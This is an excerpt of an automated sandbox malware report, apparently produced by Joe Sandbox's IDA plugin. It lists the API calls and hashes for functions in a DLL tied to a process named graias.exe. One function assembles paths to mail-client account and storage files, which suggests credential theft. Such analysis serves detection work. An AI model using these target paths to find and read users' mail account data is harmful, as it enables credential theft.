                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                            • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                                                            • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10009315
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10009320
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10009336
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                                            • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751

Control-flow Graph
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                                                                                            • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                                                            • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                                                                            • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1922816806-0
                                                                                                                                                                                                                                            • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                                                            • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3594823470-0
                                                                                                                                                                                                                                            • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                                                            • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                            • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                                                            • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                            • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                                                            • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                                              • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                                              • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                                                              • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                                            • API String ID: 4036392271-1520055953
                                                                                                                                                                                                                                            • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                                                            • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                            • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                                                            • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                                                                                                                            • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                                                            • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                            • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                                                            • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 493641738-0
                                                                                                                                                                                                                                            • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                                                            • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100091D0
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100091E2
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100091F4
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10009206
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10009218
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                                                            • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005381
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005394
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100053B6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
• Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
• Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
• Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Graias\graias.exe,00000104), ref: 10004C1D
• _free.LIBCMT ref: 10004CE8
• _free.LIBCMT ref: 10004CF2
Strings
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\AppData\Roaming\Graias\graias.exe
• API String ID: 2506810119-2791163094
• Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
• Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
• Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
• Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
• __freea.LIBCMT ref: 100087D5
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
Memory Dump Source
